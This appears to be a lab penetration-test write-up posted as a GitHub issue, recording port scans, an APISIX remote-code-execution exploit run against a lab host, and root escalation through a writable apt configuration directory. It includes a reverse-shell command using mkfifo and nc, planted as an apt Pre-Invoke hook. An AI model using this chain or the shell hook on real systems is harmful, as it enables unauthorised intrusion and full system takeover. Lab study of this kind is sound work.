Open WDavid404 opened 4 months ago
```
PORT      STATE  SERVICE    REASON         VERSION
22/tcp    open   ssh        syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http       syn-ack ttl 61 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Upright
| http-methods:
|_  Supported Methods: GET HEAD
3306/tcp  open   mysql      syn-ack ttl 61 MySQL (unauthorized)
8080/tcp  closed http-proxy reset ttl 61
43500/tcp open   http       syn-ack ttl 61 OpenResty web app server
|_http-server-header: APISIX/2.8
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
```
```
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.220:43500/FUZZ
```
--> no info
Accessed port 80, no useful info.
Checked the nmap result again:
```
searchsploit APISIX  --> Apache APISIX 2.12.1 - Remote Code Execution (RCE) | multiple/remote/50829.py
python3 50829.py http://192.168.243.220:43500/ 192.168.45.192 4444
# Note: Must have "http://"
```
--->
```
cat /etc/crontab
```
-->
Cannot see /root/run.sh. Searched "apt-get update privilege escalation" and found this article --> https://systemweakness.com/code-execution-with-apt-update-in-crontab-privesc-in-linux-e6d6ffa8d076
Make sure /etc/apt/apt.conf.d/ is writable --> linpeas confirms it.
```
cd /etc/apt/apt.conf.d/
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.192 8000 >/tmp/f"};' > shell
```
Meanwhile,
Key points: